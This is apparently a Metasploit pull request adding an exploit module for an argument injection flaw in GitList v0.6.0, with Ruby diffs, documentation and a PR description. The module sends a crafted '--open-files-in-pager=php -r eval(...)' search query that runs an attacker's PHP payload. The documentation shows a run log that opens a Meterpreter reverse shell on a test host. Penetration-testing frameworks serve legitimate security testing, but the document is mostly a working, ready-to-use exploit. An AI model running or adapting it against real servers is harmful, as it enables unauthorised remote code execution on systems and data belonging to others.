### PR TITLE
Add GitList argument injection exploit module

### DIFF
--- a/documentation/modules/exploit/multi/http/gitlist_arg_injection.md
+++ b/documentation/modules/exploit/multi/http/gitlist_arg_injection.md
@@ -1,0 +1,37 @@
+
+## Vulnerable Application
+
+  This module exploits an argument injection vulnerability in GitList v0.6.0
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use [exploit/multi/http/gitlist_arg_injection]`
+  4. Do: `set RHOSTS [IP]`
+  5. Do: `run`
+  6. You should get a session.
+
+## Scenarios
+
+### Tested on Ubuntu 18.04 x64
+
+  ```
+  msf5 > use exploit/multi/http/gitlist_arg_injection
+  msf5 exploit(multi/http/gitlist_arg_injection) > set rhosts 192.168.37.141
+  rhosts => 192.168.37.141
+  msf5 exploit(multi/http/gitlist_arg_injection) > check
+  [+] 192.168.37.141:80 The target is vulnerable.
+  msf5 exploit(multi/http/gitlist_arg_injection) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (37775 bytes) to 192.168.37.141
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.141:35804) at 2018-07-05 14:22:39 -0500
+
+  meterpreter > sysinfo
+  Computer    : ubuntu
+  OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
+  Meterpreter : php/linux
+  meterpreter >
+
+  ```

--- a/documentation/modules/exploit/multi/http/gitlist_arg_injection.md
+++ b/documentation/modules/exploit/multi/http/gitlist_arg_injection.md
@@ -1,7 +1,10 @@
+## Description
+
+  This module exploits an argument injection vulnerability in GitList v0.6.0
 
 ## Vulnerable Application
 
-  This module exploits an argument injection vulnerability in GitList v0.6.0
+  GitList v0.6.0
 
 ## Verification Steps
 

--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
-  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info={})
@@ -23,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           [ 'EDB', '44548' ]
         ],
-      'Platform'       => 'win',
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
           [ 'System or software version',
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          'BadChars' => "\x00"
+          'BadChars' => "\x20"
         },
       'Privileged'     => false,
       'DisclosureDate' => "Apr 26 2018",
@@ -43,22 +43,34 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def make_request
-    uri = normalize_uri(target_uri.path)
+      postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
+      php = %Q|<?php #{payload.encoded} ?>|
+      cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
+      cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
+      cmd << '\\"));"'
 
+      postRes = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => postUri,
+      'vars_post' => { 'query' => cmd }
+      )
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, '/gitlist/')
     res = send_request_cgi(
       'method'  =>  'GET',
       'uri'     =>  uri
     )
 
-    if res && res.code == 200
-      print_good(res.body)
-    else
-      print_error("Can't reach Gitlist")
+    unless res
+      return Exploit::CheckCode::Safe
     end
+
+    return Exploit::CheckCode::Detected if res.code == 200
   end
 
   def exploit
-    # Main function
     make_request
   end
 

--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -4,16 +4,16 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "GitList v0.6 Argument Injection",
+      'Name'           => "GitList Argument Injection",
       'Description'    => %q{
-       This module exploits an argument injection vulnerability in GitList v0.6.
-       The vulnerability arises from GitList improperly validating input using the php function, 'escapeshellarg'.
+       This module exploits an argument injection vulnerability in GitList v0.6.0.
+       The vulnerability arises from GitList improperly validating input using the php function 'escapeshellarg'.
       },
       'License'        => MSF_LICENSE,
       'Author'         => [ 'Kacper Szurek',  # EDB POC
@@ -28,9 +28,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
-          [ 'GitList v0.6', { } ]
+          [ 'GitList v0.6.0', { } ]
         ],
       'Privileged'     => false,
+      'Payload'        => { 'BadChars' => '\'"' },
       'DisclosureDate' => "Apr 26 2018",
       'DefaultTarget'  => 0))
   end
@@ -43,23 +44,21 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res && res.code == 200 && /Powered by .*GitList 0.6.0/.match(res.body)
-      return Exploit::CheckCode::Vulnerable
+      return Exploit::CheckCode::Appears
     end
 
-    return Exploit::CheckCode::Unknown
+    return Exploit::CheckCode::Safe
   end
 
   def exploit
     postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
-    cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
-    cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
-    cmd << '\\"));"'
-
-    postRes = send_request_cgi(
+    cmd = '--open-files-in-pager=php -r "eval(\\"'
+    cmd << payload.encoded
+    cmd << '\\");"'
+    send_request_cgi(
     'method' => 'POST',
     'uri'    => postUri,
     'vars_post' => { 'query' => cmd }
     )
-
   end
 end

--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -1,0 +1,65 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
+      'Description'    => %q{
+        Say something that the user might need to know
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Kacper Szurek',  # EDB POC
+                            'Shelby Pace'     # Metasploit Module
+                          ],
+      'References'     =>
+        [
+          [ 'EDB', '44548' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'System or software version',
+            {
+              'Ret' => 0x41414141 # This will be available in `target.ret`
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 26 2018",
+      'DefaultTarget'  => 0))
+
+  end
+
+  def make_request
+    uri = normalize_uri(target_uri.path)
+
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  uri
+    )
+
+    if res && res.code == 200
+      print_good(res.body)
+    else
+      print_error("Can't reach Gitlist")
+    end
+  end
+
+  def exploit
+    # Main function
+    make_request
+  end
+
+end

--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -10,9 +10,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
+      'Name'           => "Gitlist v0.6 Argument Injection",
       'Description'    => %q{
-        Say something that the user might need to know
+       This module exploits an argument injection vulnerability in Gitlist v0.6.
+       The vulnerability arises from GitList improperly validating input using the php function, 'escapeshellarg'.
       },
       'License'        => MSF_LICENSE,
       'Author'         => [ 'Kacper Szurek',  # EDB POC
@@ -20,40 +21,18 @@ class MetasploitModule < Msf::Exploit::Remote
                           ],
       'References'     =>
         [
-          [ 'EDB', '44548' ]
+          [ 'EDB', '44548' ],
+          [ 'URL', 'https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html']
         ],
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
-          [ 'System or software version',
-            {
-              'Ret' => 0x41414141 # This will be available in `target.ret`
-            }
-          ]
+          [ 'Gitlist v0.6', { } ]
         ],
-      'Payload'        =>
-        {
-          'BadChars' => "\x20"
-        },
       'Privileged'     => false,
       'DisclosureDate' => "Apr 26 2018",
       'DefaultTarget'  => 0))
-
-  end
-
-  def make_request
-      postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
-      php = %Q|<?php #{payload.encoded} ?>|
-      cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
-      cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
-      cmd << '\\"));"'
-
-      postRes = send_request_cgi(
-      'method' => 'POST',
-      'uri'    => postUri,
-      'vars_post' => { 'query' => cmd }
-      )
   end
 
   def check
@@ -63,15 +42,24 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'     =>  uri
     )
 
-    unless res
-      return Exploit::CheckCode::Safe
+    if res && res.code == 200 && /Powered by .*GitList 0.6.0/.match(res.body)
+      return Exploit::CheckCode::Vulnerable
     end
 
-    return Exploit::CheckCode::Detected if res.code == 200
+    return Exploit::CheckCode::Unknown
   end
 
   def exploit
-    make_request
-  end
+    postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
+    cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
+    cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
+    cmd << '\\"));"'
 
+    postRes = send_request_cgi(
+    'method' => 'POST',
+    'uri'    => postUri,
+    'vars_post' => { 'query' => cmd }
+    )
+
+  end
 end

--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -10,9 +10,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Gitlist v0.6 Argument Injection",
+      'Name'           => "GitList v0.6 Argument Injection",
       'Description'    => %q{
-       This module exploits an argument injection vulnerability in Gitlist v0.6.
+       This module exploits an argument injection vulnerability in GitList v0.6.
        The vulnerability arises from GitList improperly validating input using the php function, 'escapeshellarg'.
       },
       'License'        => MSF_LICENSE,
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
-          [ 'Gitlist v0.6', { } ]
+          [ 'GitList v0.6', { } ]
         ],
       'Privileged'     => false,
       'DisclosureDate' => "Apr 26 2018",


### PR DESCRIPTION
This module exploits an argument injection vulnerability in GitList v0.6.0.

## Verification

  - [x] Install the application
  - [x] Start msfconsole
  - [x] Do: `use [exploit/multi/http/gitlist_arg_injection]`
  - [x] Do: `set RHOSTS [IP]`
  - [x] Do: `run`
  - [x] You should get a session.